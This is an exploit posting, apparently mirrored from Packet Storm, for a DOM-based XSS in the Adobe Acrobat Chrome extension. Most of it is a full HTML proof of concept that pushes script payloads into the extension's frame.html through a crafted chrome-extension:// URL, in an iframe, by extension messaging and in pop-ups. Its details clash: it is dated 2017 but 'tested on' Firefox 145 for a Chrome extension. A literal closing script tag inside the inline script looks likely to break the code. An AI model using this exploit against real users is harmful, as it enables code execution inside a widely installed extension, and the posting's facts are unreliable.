Share
## https://sploitus.com/exploit?id=PACKETSTORM:212600
=============================================================================================================================================
    | # Title     : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj                         |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212491/ 
    
    [+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
                  DOM-based XSS condition. Malicious payloads are executed inside the extension context.
    
    [+] Date: January 2017
    
        Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)
    
        Type: DOM-based Cross-Site Scripting (XSS)
    
        Users Affected: ~30 million installations (via forced auto-update)
    	
    [+] Technical Details:
    
    The extension receives JSON data and renders dynamic HTML without 
    proper sanitization. The vulnerable code accepts untrusted strings
    and injects them into the DOM using innerHTML.
    
    [+] Impact:
    An attacker can execute arbitrary JavaScript within the extension
    context, bypassing browser Same Origin Policy and triggering 
    extension-level privileges.
    
    [+] Exploit (PoC):
    The following sanitized PoC demonstrates the XSS trigger behavior.
    
    Steps to Reproduce:
    1. Install Adobe Acrobat Chrome Extension.
    2. Visit a crafted local HTML page.
    3. Observe execution of JavaScript inside the frame context.
    
    Save Instructions:
    Code below should be saved in `poc.html` and opened locally.
    
    Execution:
    Open `poc.html` in Chrome with the extension installed. Observe
    console logs confirming rendering inside the extension's frame.
    
    [+]  POC :	
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>Adobe Acrobat XSS Exploit</title>
    </head>
    <body>
        <h2>Adobe Acrobat Extension DOM XSS Exploit</h2>
        
        <div id="exploit-container"></div>
        
        <script>
        // Extension ID and vulnerable page
        const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
        const VULNERABLE_PAGE = 'data/js/frame.html';
        
        function createExploit() {
            // Advanced XSS payload with multiple vectors
            const payload = {
                panel_op: "status",
                current_status: "failure",
                message: `
                    <div style="background:red;color:white;padding:20px;">
                        <h1>XSS EXECUTED</h1>
                        <p>Domain: <script>document.write(document.domain)</script></p>
                        <svg/onload="alert('POC By Indoushka: ' + location.href)">
                    </div>
                    <iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
                `.replace(/\n/g, ' ').trim()
            };
            
            // URL encode the payload
            const encodedPayload = encodeURIComponent(JSON.stringify(payload));
            const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;
            
            return exploitUrl;
        }
        
        function executeExploit() {
            const exploitUrl = createExploit();
            
            // Method 1: Try with iframe sandbox bypass
            const iframe = document.createElement('iframe');
            iframe.sandbox = 'allow-scripts allow-same-origin';
            iframe.src = exploitUrl;
            iframe.style.width = "500px";
            iframe.style.height = "400px";
            iframe.style.border = "3px solid red";
            
            document.getElementById('exploit-container').appendChild(iframe);
            
            console.log('Exploit URL:', exploitUrl);
            
            // Method 2: Try to trigger via extension messaging
            setTimeout(() => {
                try {
                    // Try to communicate with the extension
                    chrome.runtime.sendMessage(EXTENSION_ID, { 
                        type: 'trefoil_html_convert',
                        data: payload 
                    }, response => {
                        console.log('Extension response:', response);
                    });
                } catch(e) {
                    console.log('Direct messaging failed:', e.message);
                }
            }, 1000);
            
            // Method 3: Create a popup with user gesture
            document.body.onclick = function() {
                window.open(exploitUrl, '_blank', 'width=600,height=400');
            };
        }
        
        // Execute exploit after page load
        window.onload = executeExploit;
        
        // Alternative: Use button with user gesture
        document.body.innerHTML += `
            <button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
                Click to Trigger Exploit (User Gesture Required)
            </button>
        `;
        </script>
    </body>
    </html>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================